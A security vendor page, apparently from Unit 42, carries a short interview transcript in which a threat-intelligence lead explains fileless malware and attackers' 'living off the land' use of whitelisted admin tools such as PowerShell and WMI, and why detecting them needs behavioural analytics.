- What is a Cyber Attack?
- What Is Hacktivism?
-
What is a DDoS Attack?
- Understanding DDoS Attacks
- How to Recognize a DDoS Attack
- How DDoS Attacks Work: A Technical Deep Dive
- The Growing Threat Landscape: Why DDoS Matters Now
- Motivations Behind DDoS Attacks: Understanding the Attackers
- The Impact of DDoS Attacks: Real-World Consequences
- DDoS Attack Mitigation Strategies
- DDoS in the Cloud: Unique Challenges and Considerations
- The Future of DDoS Attacks: Emerging Trends and Threats
- DDoS Glossary: Key Terms and Concepts
- DDoS Attack FAQs
- What is a Command and Control Attack?
- What Is Spear Phishing?
- What Is a Dictionary Attack?
- What Is Password Spraying?
- What Is Cryptojacking?
-
What is Social Engineering?
- The Role of Human Psychology in Social Engineering
- How Has Social Engineering Evolved?
- How Does Social Engineering Work?
- Phishing vs Social Engineering
- What is BEC (Business Email Compromise)?
- Notable Social Engineering Incidents
- Social Engineering Prevention
- Consequences of Social Engineering
- Social Engineering FAQs
- What Is Smishing?
-
What Is Phishing?
- Phishing Explained
- The Evolution of Phishing
- The Anatomy of a Phishing Attack
- Why Phishing Is Difficult to Detect
- Types of Phishing
- Phishing Adversaries and Motives
- The Psychology of Exploitation
- Lessons from Phishing Incidents
- Building a Modern Security Stack Against Phishing
- Building Organizational Immunity
- Phishing FAQ
-
What Is Lateral Movement?
- Why Attackers Use Lateral Movement
- How Do Lateral Movement Attacks Work?
- Stages of a Lateral Movement Attack
- Techniques Used in Lateral Movement
- Detection Strategies for Lateral Movement
- Tools to Prevent Lateral Movement
- Best Practices for Defense
- Recent Trends in Lateral Movement Attacks
- Industry-Specific Challenges
- Compliance and Regulatory Requirements
- Financial Impact and ROI Considerations
- Common Mistakes to Avoid
- Lateral Movement FAQs
-
What is a Botnet?
- How Botnets Work
- Why are Botnets Created?
- What are Botnets Used For?
- Types of Botnets
- Signs Your Device May Be in a Botnet
- How to Protect Against Botnets
- Why Botnets Lead to Long-Term Intrusions
- How To Disable a Botnet
- Tools and Techniques for Botnet Defense
- Real-World Examples of Botnets
- Botnet FAQs
- What Is an Advanced Persistent Threat?
- What Are DNS Attacks?
-
What Is a Denial of Service (DoS) Attack?
- How Denial-of-Service Attacks Work
- Denial-of-Service in Adversary Campaigns
- Real-World Denial-of-Service Attacks
- Detection and Indicators of Denial-of-Service Attacks
- Prevention and Mitigation of Denial-of-Service Attacks
- Response and Recovery from Denial-of-Service Attacks
- Operationalizing Denial-of-Service Defense
- DoS Attack FAQs
- What Is a Credential-Based Attack?
- Browser Cryptocurrency Mining
- How to Break the Cyber Attack Lifecycle
-
FreeMilk Conversation Hijacking Spear Phishing Campaign
-
What Is CSRF (Cross-Site Request Forgery)?
- CSRF Explained
- How Cross-Site Request Forgery Works
- Where CSRF Fits in the Broader Attack Lifecycle
- CSRF in Real-World Exploits
- Detecting CSRF Through Behavioral and Telemetry Signals
- Defending Against Cross-Site Request Forgery
- Responding to a CSRF Incident
- CSRF as a Strategic Business Risk
- Key Priorities for CSRF Defense and Resilience
- Cross-Site Request Forgery FAQs
- Android Toast Overlay Attack
-
What Is Cross-Site Scripting (XSS)?
- XSS Explained
- Evolution in Attack Complexity
- Anatomy of a Cross-Site Scripting Attack
- Integration in the Attack Lifecycle
- Widespread Exposure in the Wild
- Cross-Site Scripting Detection and Indicators
- Prevention and Mitigation
- Response and Recovery Post XSS Attack
- Strategic Cross-Site Scripting Risk Perspective
- Cross-Site Scripting FAQs
- What Is Credential Stuffing?
-
What Is Brute Force?
- How Brute Force Functions as a Threat
- How Brute Force Works in Practice
- Brute Force in Multistage Attack Campaigns
- Real-World Brute Force Campaigns and Outcomes
- Detection Patterns in Brute Force Attacks
- Practical Defense Against Brute Force Attacks
- Response and Recovery After a Brute Force Incident
- Brute Force Attack FAQs
- What Is DNS Rebinding? [Examples + Protection Tips]
- What Is DNS Hijacking?
-
What Is a Prompt Injection Attack? [Examples & Prevention]
- How does a prompt injection attack work?
- What are the different types of prompt injection attacks?
- Examples of prompt injection attacks
- What is the difference between prompt injections and jailbreaking?
- What are the potential consequences of prompt injection attacks?
- How to prevent prompt injection: best practices, tips, and tricks
- A brief history of prompt injection
- Prompt injection attack FAQs
-
What is an NXNSAttack?
What Are Fileless Malware Attacks and “Living Off the Land”? Unit 42 Explains
Understand the fundamentals of cryptocurrency, including blockchain, distributed ledgers, and key concepts that make this technology both complex and intriguing.
Fileless malware and “living off the land” have been around for a while, but they have seen a resurgence in recent months. What’s behind this growing popularity? Jen Miller Osborn, deputy director of Threat Intelligence for Unit 42®, explains what fileless malware attacks are and why “living off the land” is so attractive for malicious actors.
Read the full transcript below.
Jen Miller Osborn: So, I wanted to take a second to talk about two things that are very much in the news lately. And those are things called fileless malware attacks and "living off the land."
Fileless malware attacks are something where attackers are using things that aren't written to disk. So, things that are staying in volatile memory, such as PowerShell and WMI. And they're doing that because they are much harder to both detect and to find later, because a lot of times, they aren't kept in logs.
So, you'll see attackers doing things where they're automating a lot of their initial attacks, where they'll use something such as PowerShell or WMI to figure out both where they've landed in the system and do some basic network reconnaissance to decide whether or not they are in a place where they want to be. And those things are very hard to detect via traditional AV vendors, and even without some behavior analytics, they're harder to find.
And then, along with that, to also avoid detection, we're seeing attackers more and more moving toward a thing that's called "living off the land," which is where they're repurposing things that are typically legitimate admin tools, whether Windows or Macintosh or Linux or whatever. And they're tools that admins will use to monitor their environment, to dump credentials, to kind of figure out what's going on. But now, you have attackers using those same tools, which, in a lot of cases, are whitelisted because these are legitimate tools that system admins use.
But, you're seeing attackers repurposing them now, where they're using them to basically accomplish the same things that a lot of sysadmins do – to determine where they are, to do some network administration, to do some account administration, and checking on hashes. But they're using them maliciously, which is much harder to detect because, as a basic network posture, those things are going to be whitelisted.
So, those are two ways that attackers now are moving into spaces that are, A, hard to detect, and B, require a lot more behavioral analytics. Because there are a lot of things that you'll typically see legitimate system admins use but you're seeing attackers use. Because instead of using malware or using something such as Mimikatz, which is a known tool, which a lot of people will flag, now they're using tools where they’re going to be whitelisted.
And they’re probably – if they're not already present on a network for legitimate purposes, you'll see, a lot of times, attackers will bring them down because they're aware that these are legitimate tools and that they’re probably whitelisted. You aren't going to detect them maliciously unless you're running additional behavioral analytics that will show you them being used in a way that the sysadmin would not be using them.
